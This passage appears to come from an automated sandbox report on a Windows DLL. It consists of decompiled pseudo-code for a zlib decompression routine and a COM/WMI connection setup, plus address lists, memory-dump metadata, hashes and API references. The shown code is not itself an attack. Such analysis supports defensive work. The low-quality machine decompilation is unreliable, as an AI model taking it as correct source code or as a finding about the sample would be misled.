                                                                                                                                                                                                											if(_t207 < _t361) {
                                                                                                                                                                                                												_t208 = _t435[0xd];
                                                                                                                                                                                                												_t318 =  ~_t207;
                                                                                                                                                                                                												_t414 = _t435[0xe];
                                                                                                                                                                                                												if(_t208 < _t361) {
                                                                                                                                                                                                													L100:
                                                                                                                                                                                                													_t396 = _t435[0xb];
                                                                                                                                                                                                													_t280 = "invalid distance too far back";
                                                                                                                                                                                                													_t350 = 0x1a;
                                                                                                                                                                                                													goto L101;
                                                                                                                                                                                                												}
                                                                                                                                                                                                												_t319 = _t318 + _t361;
                                                                                                                                                                                                												if(_t435[0xc] != 0) {
                                                                                                                                                                                                													_t209 = _t435[0xc];
                                                                                                                                                                                                													if(_t319 <= _t209) {
                                                                                                                                                                                                														_t416 = _t414 + _t209 - _t319;
                                                                                                                                                                                                														_t210 = _t435[6];
                                                                                                                                                                                                														if(_t210 > _t319) {
                                                                                                                                                                                                															_t210 = memcpy(_t368, _t416, _t319);
                                                                                                                                                                                                															_t435 =  &(_t435[3]);
                                                                                                                                                                                                															_t368 = _t416 + _t319 + _t319;
                                                                                                                                                                                                															_t416 = _t368 - _t361;
                                                                                                                                                                                                														}
                                                                                                                                                                                                													} else {
                                                                                                                                                                                                														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
                                                                                                                                                                                                														_t324 = _t319 - _t209;
                                                                                                                                                                                                														_t210 = _t435[6];
                                                                                                                                                                                                														if(_t210 > _t324) {
                                                                                                                                                                                                															_t210 = memcpy(_t368, _t416, _t324);
                                                                                                                                                                                                															_t435 =  &(_t435[3]);
                                                                                                                                                                                                															_t368 = _t416 + _t324 + _t324;
                                                                                                                                                                                                															_t416 = _t435[0xe];
                                                                                                                                                                                                															_t326 = _t435[0xc];
                                                                                                                                                                                                															if(_t210 > _t326) {
                                                                                                                                                                                                																_t210 = memcpy(_t368, _t416, _t326);
                                                                                                                                                                                                																_t435 =  &(_t435[3]);
                                                                                                                                                                                                																_t368 = _t416 + _t326 + _t326;
                                                                                                                                                                                                																_t416 = _t368 - _t361;
                                                                                                                                                                                                															}
                                                                                                                                                                                                														}
                                                                                                                                                                                                													}
                                                                                                                                                                                                												} else {
                                                                                                                                                                                                													_t416 = _t414 + _t208 - _t319;
                                                                                                                                                                                                													_t210 = _t435[6];
                                                                                                                                                                                                													if(_t210 > _t319) {
                                                                                                                                                                                                														_t210 = memcpy(_t368, _t416, _t319);
                                                                                                                                                                                                														_t435 =  &(_t435[3]);
                                                                                                                                                                                                														_t368 = _t416 + _t319 + _t319;
                                                                                                                                                                                                														_t416 = _t368 - _t361;
                                                                                                                                                                                                													}
                                                                                                                                                                                                												}
                                                                                                                                                                                                												_t320 = _t210;
                                                                                                                                                                                                												memcpy(_t368, _t416, _t320);
                                                                                                                                                                                                												_t435 =  &(_t435[3]);
                                                                                                                                                                                                												_t368 = _t416 + _t320 + _t320;
                                                                                                                                                                                                												_t396 = _t435[0xb];
                                                                                                                                                                                                												goto L22;
                                                                                                                                                                                                											}
                                                                                                                                                                                                											_t423 = _t368 - _t361;
                                                                                                                                                                                                											_t330 = _t435[6] - 3;
                                                                                                                                                                                                											 *_t368 =  *_t423;
                                                                                                                                                                                                											_t424 = _t423 + 3;
                                                                                                                                                                                                											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
                                                                                                                                                                                                											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
                                                                                                                                                                                                											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x1001d040 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x1001d040 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x1001d040 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x1001d040 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x1001533c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x1001533c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
                                                                                                                                                                                                							asm("movq mm5, mm2");
                                                                                                                                                                                                							_t179 =  *(_t435[3] + _t178 * 4);
                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                								_t287 = _t179 & 0x000000ff;
                                                                                                                                                                                                								_t253 = _t179 >> 0x10;
                                                                                                                                                                                                								_t431 = _t431 - _t287;
                                                                                                                                                                                                								asm("movd mm1, ecx");
                                                                                                                                                                                                								if((_t179 & 0x00000010) != 0) {
                                                                                                                                                                                                									break;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								if((_t179 & 0x00000040) != 0) {
                                                                                                                                                                                                									goto L96;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								asm("psrlq mm0, mm1");
                                                                                                                                                                                                								asm("movd ecx, mm0");
                                                                                                                                                                                                								_t179 =  *(_t435[3] + ((_t287 &  *(0x1001533c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t182 = _t179 & 0x0000000f;
                                                                                                                                                                                                							if(_t182 == 0) {
                                                                                                                                                                                                								if(_t253 != 1 || _t435[0xa] == _t368) {
                                                                                                                                                                                                									L76:
                                                                                                                                                                                                									_t435[0xb] = _t396;
                                                                                                                                                                                                									_t184 = _t368 - _t435[0xa];
                                                                                                                                                                                                									if(_t184 < _t253) {
                                                                                                                                                                                                										_t185 = _t435[0xd];
                                                                                                                                                                                                										_t291 =  ~_t184;
                                                                                                                                                                                                										_t403 = _t435[0xe];
                                                                                                                                                                                                										if(_t185 < _t253) {
                                                                                                                                                                                                											goto L100;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t292 = _t291 + _t253;
                                                                                                                                                                                                										if(_t435[0xc] != 0) {
                                                                                                                                                                                                											_t186 = _t435[0xc];
                                                                                                                                                                                                											if(_t292 <= _t186) {
                                                                                                                                                                                                												_t405 = _t403 + _t186 - _t292;
                                                                                                                                                                                                												if(_t349 > _t292) {
                                                                                                                                                                                                													_t349 = _t349 - _t292;
                                                                                                                                                                                                													memcpy(_t368, _t405, _t292);
                                                                                                                                                                                                													_t435 =  &(_t435[3]);
                                                                                                                                                                                                													_t368 = _t405 + _t292 + _t292;
                                                                                                                                                                                                													_t405 = _t368 - _t253;
                                                                                                                                                                                                												}
                                                                                                                                                                                                											} else {
                                                                                                                                                                                                												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
                                                                                                                                                                                                												_t296 = _t292 - _t186;
                                                                                                                                                                                                												if(_t349 > _t296) {
                                                                                                                                                                                                													_t349 = _t349 - _t296;
                                                                                                                                                                                                													memcpy(_t368, _t405, _t296);
                                                                                                                                                                                                													_t435 =  &(_t435[3]);
                                                                                                                                                                                                													_t368 = _t405 + _t296 + _t296;
                                                                                                                                                                                                													_t405 = _t435[0xe];
                                                                                                                                                                                                													_t298 = _t435[0xc];
                                                                                                                                                                                                													if(_t349 > _t298) {
                                                                                                                                                                                                														_t349 = _t349 - _t298;
                                                                                                                                                                                                														memcpy(_t368, _t405, _t298);
                                                                                                                                                                                                														_t435 =  &(_t435[3]);
                                                                                                                                                                                                														_t368 = _t405 + _t298 + _t298;
                                                                                                                                                                                                														_t405 = _t368 - _t253;
                                                                                                                                                                                                													}
                                                                                                                                                                                                												}
                                                                                                                                                                                                											}
                                                                                                                                                                                                										} else {
                                                                                                                                                                                                											_t405 = _t403 + _t185 - _t292;
                                                                                                                                                                                                											if(_t349 > _t292) {
                                                                                                                                                                                                												_t349 = _t349 - _t292;
                                                                                                                                                                                                												memcpy(_t368, _t405, _t292);
                                                                                                                                                                                                												_t435 =  &(_t435[3]);
                                                                                                                                                                                                												_t368 = _t405 + _t292 + _t292;
                                                                                                                                                                                                												_t405 = _t368 - _t253;
                                                                                                                                                                                                											}
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t293 = _t349;
                                                                                                                                                                                                										_t172 = memcpy(_t368, _t405, _t293);
                                                                                                                                                                                                										_t435 =  &(_t435[3]);
                                                                                                                                                                                                										_t368 = _t405 + _t293 + _t293;
                                                                                                                                                                                                										_t396 = _t435[0xb];
                                                                                                                                                                                                										_t253 = _t435[2];
                                                                                                                                                                                                										goto L64;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t412 = _t368 - _t253;
                                                                                                                                                                                                									_t302 = _t349 - 3;
                                                                                                                                                                                                									 *_t368 =  *_t412;
                                                                                                                                                                                                									_t413 = _t412 + 3;
                                                                                                                                                                                                									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
                                                                                                                                                                                                									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
                                                                                                                                                                                                									_t172 = memcpy(_t368 + 3, _t413, _t302);
                                                                                                                                                                                                									_t435 =  &(_t435[3]);
                                                                                                                                                                                                									_t368 = _t413 + _t302 + _t302;
                                                                                                                                                                                                									_t396 = _t435[0xb];
                                                                                                                                                                                                									_t253 = _t435[2];
                                                                                                                                                                                                									goto L64;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_t380 = _t368 - 1;
                                                                                                                                                                                                									_t194 =  *_t380;
                                                                                                                                                                                                									_t305 = _t349 - 3;
                                                                                                                                                                                                									 *(_t380 + 1) = _t194;
                                                                                                                                                                                                									 *(_t380 + 2) = _t194;
                                                                                                                                                                                                									 *(_t380 + 3) = _t194;
                                                                                                                                                                                                									_t381 = _t380 + 4;
                                                                                                                                                                                                									_t172 = memset(_t381, _t194, _t305 << 0);
                                                                                                                                                                                                									_t435 =  &(_t435[3]);
                                                                                                                                                                                                									_t368 = _t381 + _t305;
                                                                                                                                                                                                									_t253 = _t435[2];
                                                                                                                                                                                                									L64:
                                                                                                                                                                                                									if(_t435[4] <= _t368) {
                                                                                                                                                                                                										goto L104;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									goto L65;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							asm("psrlq mm0, mm1");
                                                                                                                                                                                                							asm("movd mm1, eax");
                                                                                                                                                                                                							asm("movd ecx, mm0");
                                                                                                                                                                                                							_t431 = _t431 - _t182;
                                                                                                                                                                                                							_t253 = _t253 + (_t287 &  *(0x1001533c + _t182 * 4));
                                                                                                                                                                                                							goto L76;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t172 = _t173 >> 0x10;
                                                                                                                                                                                                						asm("stosb");
                                                                                                                                                                                                						goto L64;
                                                                                                                                                                                                						L65:
                                                                                                                                                                                                					} while (_t435[5] > _t396);
                                                                                                                                                                                                					goto L104;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}
                                                                                                                                                                                                0x1001543a
                                                                                                                                                                                                0x1001543e
                                                                                                                                                                                                0x10015442
                                                                                                                                                                                                0x10015446
                                                                                                                                                                                                0x10015449
                                                                                                                                                                                                0x1001544c
                                                                                                                                                                                                0x10015450
                                                                                                                                                                                                0x10015456
                                                                                                                                                                                                0x1001547a
                                                                                                                                                                                                0x10015480
                                                                                                                                                                                                0x10015486
                                                                                                                                                                                                0x10015487
                                                                                                                                                                                                0x10015489
                                                                                                                                                                                                0x1001548c
                                                                                                                                                                                                0x1001548e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001548e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015458
                                                                                                                                                                                                0x1001545b
                                                                                                                                                                                                0x1001546e
                                                                                                                                                                                                0x1001546e
                                                                                                                                                                                                0x1001546e
                                                                                                                                                                                                0x10015470
                                                                                                                                                                                                0x10015474
                                                                                                                                                                                                0x10015492
                                                                                                                                                                                                0x10015492
                                                                                                                                                                                                0x10015496
                                                                                                                                                                                                0x10015496
                                                                                                                                                                                                0x1001549d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100154a3
                                                                                                                                                                                                0x10015510
                                                                                                                                                                                                0x10015513
                                                                                                                                                                                                0x10015517
                                                                                                                                                                                                0x10015519
                                                                                                                                                                                                0x1001551b
                                                                                                                                                                                                0x10015520
                                                                                                                                                                                                0x10015520
                                                                                                                                                                                                0x1001552b
                                                                                                                                                                                                0x1001552e
                                                                                                                                                                                                0x10015530
                                                                                                                                                                                                0x10015532
                                                                                                                                                                                                0x10015536
                                                                                                                                                                                                0x1001553b
                                                                                                                                                                                                0x1001553b
                                                                                                                                                                                                0x1001553b
                                                                                                                                                                                                0x10015553
                                                                                                                                                                                                0x10015556
                                                                                                                                                                                                0x1001555a
                                                                                                                                                                                                0x10015656
                                                                                                                                                                                                0x1001596a
                                                                                                                                                                                                0x1001596c
                                                                                                                                                                                                0x1001597a
                                                                                                                                                                                                0x1001597f
                                                                                                                                                                                                0x1001596e
                                                                                                                                                                                                0x1001596e
                                                                                                                                                                                                0x10015973
                                                                                                                                                                                                0x10015973
                                                                                                                                                                                                0x10015996
                                                                                                                                                                                                0x10015996
                                                                                                                                                                                                0x1001599c
                                                                                                                                                                                                0x1001599e
                                                                                                                                                                                                0x1001599e
                                                                                                                                                                                                0x100159a4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100159a4
                                                                                                                                                                                                0x1001566c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001566c
                                                                                                                                                                                                0x10015560
                                                                                                                                                                                                0x10015563
                                                                                                                                                                                                0x10015567
                                                                                                                                                                                                0x1001556d
                                                                                                                                                                                                0x1001556f
                                                                                                                                                                                                0x10015571
                                                                                                                                                                                                0x10015576
                                                                                                                                                                                                0x10015578
                                                                                                                                                                                                0x10015578
                                                                                                                                                                                                0x10015582
                                                                                                                                                                                                0x10015584
                                                                                                                                                                                                0x10015586
                                                                                                                                                                                                0x10015588
                                                                                                                                                                                                0x10015588
                                                                                                                                                                                                0x1001558a
                                                                                                                                                                                                0x10015591
                                                                                                                                                                                                0x10015595
                                                                                                                                                                                                0x10015597
                                                                                                                                                                                                0x10015599
                                                                                                                                                                                                0x1001559e
                                                                                                                                                                                                0x1001559e
                                                                                                                                                                                                0x100155aa
                                                                                                                                                                                                0x100155ad
                                                                                                                                                                                                0x100155af
                                                                                                                                                                                                0x100155b4
                                                                                                                                                                                                0x100155b6
                                                                                                                                                                                                0x100155b8
                                                                                                                                                                                                0x100155bc
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015676
                                                                                                                                                                                                0x1001595e
                                                                                                                                                                                                0x1001595e
                                                                                                                                                                                                0x10015963
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015963
                                                                                                                                                                                                0x1001568c
                                                                                                                                                                                                0x1001568c
                                                                                                                                                                                                0x100155c2
                                                                                                                                                                                                0x100155c5
                                                                                                                                                                                                0x1001562f
                                                                                                                                                                                                0x100155ee
                                                                                                                                                                                                0x100155ee
                                                                                                                                                                                                0x100155f4
                                                                                                                                                                                                0x100155fa
                                                                                                                                                                                                0x10015696
                                                                                                                                                                                                0x1001569a
                                                                                                                                                                                                0x1001569c
                                                                                                                                                                                                0x100156a2
                                                                                                                                                                                                0x10015986
                                                                                                                                                                                                0x10015986
                                                                                                                                                                                                0x1001598a
                                                                                                                                                                                                0x1001598f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001598f
                                                                                                                                                                                                0x100156a8
                                                                                                                                                                                                0x100156af
                                                                                                                                                                                                0x100156d5
                                                                                                                                                                                                0x100156db
                                                                                                                                                                                                0x1001570b
                                                                                                                                                                                                0x1001570d
                                                                                                                                                                                                0x10015713
                                                                                                                                                                                                0x10015717
                                                                                                                                                                                                0x10015717
                                                                                                                                                                                                0x10015717
                                                                                                                                                                                                0x1001571b
                                                                                                                                                                                                0x1001571b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015799
                                                                                                                                                                                                0x1001579e
                                                                                                                                                                                                0x10015886
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001588f
                                                                                                                                                                                                0x10015892
                                                                                                                                                                                                0x1001589e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001589e
                                                                                                                                                                                                0x100157a4
                                                                                                                                                                                                0x100157a7
                                                                                                                                                                                                0x100157a9
                                                                                                                                                                                                0x100157ac
                                                                                                                                                                                                0x100157af
                                                                                                                                                                                                0x100157b2
                                                                                                                                                                                                0x100157bb
                                                                                                                                                                                                0x100157bb
                                                                                                                                                                                                0x100157bd
                                                                                                                                                                                                0x100157c3
                                                                                                                                                                                                0x100157c5
                                                                                                                                                                                                0x100157c8
                                                                                                                                                                                                0x100157cb
                                                                                                                                                                                                0x100157ce
                                                                                                                                                                                                0x100157d1
                                                                                                                                                                                                0x100157d4
                                                                                                                                                                                                0x100157d4
                                                                                                                                                                                                0x100157db
                                                                                                                                                                                                0x100157de
                                                                                                                                                                                                0x100157e1
                                                                                                                                                                                                0x100157e4
                                                                                                                                                                                                0x100157e7
                                                                                                                                                                                                0x100157e7
                                                                                                                                                                                                0x100157ec
                                                                                                                                                                                                0x100157ef
                                                                                                                                                                                                0x100157f1
                                                                                                                                                                                                0x100157f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100158aa
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100158b3
                                                                                                                                                                                                0x100158b6
                                                                                                                                                                                                0x100158c6
                                                                                                                                                                                                0x100158c6
                                                                                                                                                                                                0x100157fc
                                                                                                                                                                                                0x100157ff
                                                                                                                                                                                                0x1001585b
                                                                                                                                                                                                0x10015815
                                                                                                                                                                                                0x10015815
                                                                                                                                                                                                0x1001581b
                                                                                                                                                                                                0x10015821
                                                                                                                                                                                                0x100158d2
                                                                                                                                                                                                0x100158d6
                                                                                                                                                                                                0x100158d8
                                                                                                                                                                                                0x100158de
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100158e4
                                                                                                                                                                                                0x100158eb
                                                                                                                                                                                                0x1001590d
                                                                                                                                                                                                0x10015913
                                                                                                                                                                                                0x1001593f
                                                                                                                                                                                                0x10015943
                                                                                                                                                                                                0x10015945
                                                                                                                                                                                                0x10015947
                                                                                                                                                                                                0x10015947
                                                                                                                                                                                                0x10015947
                                                                                                                                                                                                0x1001594b
                                                                                                                                                                                                0x1001594b
                                                                                                                                                                                                0x10015915
                                                                                                                                                                                                0x1001591b
                                                                                                                                                                                                0x1001591d
                                                                                                                                                                                                0x10015921
                                                                                                                                                                                                0x10015923
                                                                                                                                                                                                0x10015925
                                                                                                                                                                                                0x10015925
                                                                                                                                                                                                0x10015925
                                                                                                                                                                                                0x10015927
                                                                                                                                                                                                0x1001592b
                                                                                                                                                                                                0x10015931
                                                                                                                                                                                                0x10015933
                                                                                                                                                                                                0x10015935
                                                                                                                                                                                                0x10015935
                                                                                                                                                                                                0x10015935
                                                                                                                                                                                                0x10015939
                                                                                                                                                                                                0x10015939
                                                                                                                                                                                                0x10015931
                                                                                                                                                                                                0x10015921
                                                                                                                                                                                                0x100158ed
                                                                                                                                                                                                0x100158ef
                                                                                                                                                                                                0x100158f3
                                                                                                                                                                                                0x100158f5
                                                                                                                                                                                                0x100158f7
                                                                                                                                                                                                0x100158f7
                                                                                                                                                                                                0x100158f7
                                                                                                                                                                                                0x100158fb
                                                                                                                                                                                                0x100158fb
                                                                                                                                                                                                0x100158f3
                                                                                                                                                                                                0x1001594d
                                                                                                                                                                                                0x1001594f
                                                                                                                                                                                                0x1001594f
                                                                                                                                                                                                0x1001594f
                                                                                                                                                                                                0x10015951
                                                                                                                                                                                                0x10015955
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015955
                                                                                                                                                                                                0x1001582b
                                                                                                                                                                                                0x1001582d
                                                                                                                                                                                                0x10015832
                                                                                                                                                                                                0x1001583a
                                                                                                                                                                                                0x1001583d
                                                                                                                                                                                                0x10015840
                                                                                                                                                                                                0x10015846
                                                                                                                                                                                                0x10015846
                                                                                                                                                                                                0x10015846
                                                                                                                                                                                                0x10015848
                                                                                                                                                                                                0x1001584c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015863
                                                                                                                                                                                                0x10015863
                                                                                                                                                                                                0x10015866
                                                                                                                                                                                                0x10015868
                                                                                                                                                                                                0x1001586b
                                                                                                                                                                                                0x1001586e
                                                                                                                                                                                                0x10015871
                                                                                                                                                                                                0x10015874
                                                                                                                                                                                                0x10015877
                                                                                                                                                                                                0x10015877
                                                                                                                                                                                                0x10015877
                                                                                                                                                                                                0x10015879
                                                                                                                                                                                                0x10015782
                                                                                                                                                                                                0x10015786
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                                                                                                                                                • API String ID: 0-3089872807
                                                                                                                                                                                                • Opcode ID: 2c9f3f73b7300a5551f5e63896b23f8b0b715e92add786df6d269eb33b5170bd
                                                                                                                                                                                                • Instruction ID: fac0eb44e7ef1ba0e8fa27e73f891139cf5bdba97e6d8b24c0e442f6646d81f1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c9f3f73b7300a5551f5e63896b23f8b0b715e92add786df6d269eb33b5170bd
                                                                                                                                                                                                • Instruction Fuzzy Hash: C5122831A08752CFD715DE38C59020ABBE2FB88296F59862DE885DFB41D372DD85CB81
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 30%
                                                                                                                                                                                                			E1000D565(void* __ecx) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                				char* _t15;
                                                                                                                                                                                                				intOrPtr* _t16;
                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                				intOrPtr* _t23;
                                                                                                                                                                                                				intOrPtr* _t24;
                                                                                                                                                                                                				intOrPtr* _t25;
                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                                                				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                                                				_t15 =  &_v12;
                                                                                                                                                                                                				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
                                                                                                                                                                                                				if(_t15 < 0) {
                                                                                                                                                                                                					L5:
                                                                                                                                                                                                					_t23 = _v8;
                                                                                                                                                                                                					if(_t23 != 0) {
                                                                                                                                                                                                						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t24 = _v12;
                                                                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                                                                						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t16 = 0;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					__imp__#2(__ecx);
                                                                                                                                                                                                					_t25 = _v12;
                                                                                                                                                                                                					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                                                					if(_t21 < 0) {
                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                                                						if(_t21 < 0) {
                                                                                                                                                                                                							goto L5;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t16 = E100085E5(8);
                                                                                                                                                                                                							if(_t16 == 0) {
                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                                                								 *_t16 = _v8;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t16;
                                                                                                                                                                                                			}














                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D578
                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D589
                                                                                                                                                                                                • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D5A0
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000D5AB
